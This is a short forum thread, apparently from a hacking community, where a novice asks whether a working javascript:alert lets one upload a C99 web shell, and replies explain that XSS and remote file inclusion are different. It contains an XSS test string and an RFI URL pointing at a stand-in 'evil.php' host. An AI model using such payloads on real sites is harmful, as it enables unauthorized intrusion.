Does javascript alert always mean

Hey, I was just curious to know if when javascript:alert is used and works on a site. Does this always mean that you can run a shell through the site or not all the time?

It means you don't understand a thing about the subject you are studying.

Thats what I figured.

yeah man learn a bit about javascript injections. things will make more sense then.

to answer your question directly, no.

javascript injections have nothing to do with running a shell on a site.

No man, sorry. Thats not what I mean. I was saying would the fact that javascript:alert works. Does this mean I could inject a shell such as C99 through a javascript snippet which runs the remote page locally. Like ?page=www.site.com/shell

Nope. Think about it logically. You can javascript:alert any page (like for example this hbh page) so it wouldn't make much sense if you could then open up a shell on hbh because it is obviously a pretty secure website. If it was that easy there'd be nothing to taking over any site.

right all your doing is saying "make a popup"

I think that's not what he means either. I think that what he asks is when a page is vulnerable to XSS, which you can test with a JavaScript alert, whether you can also include a C99 shell. Am I right?

index.php?id=<script>alert("abc");</script>

While the above may work, the bellow may not, and vice versa.

index.php?id=http://www.mysite.com/evil.php

This thread made me confused, but I suppose the answer you're looking for is something like this: ** "Just because you can put javascript injections in the URL bar no matter what site you're visiting, it doesn't mean the site is vulnerable to RFI. Javascript is client-side scripts and PHP is server-side."**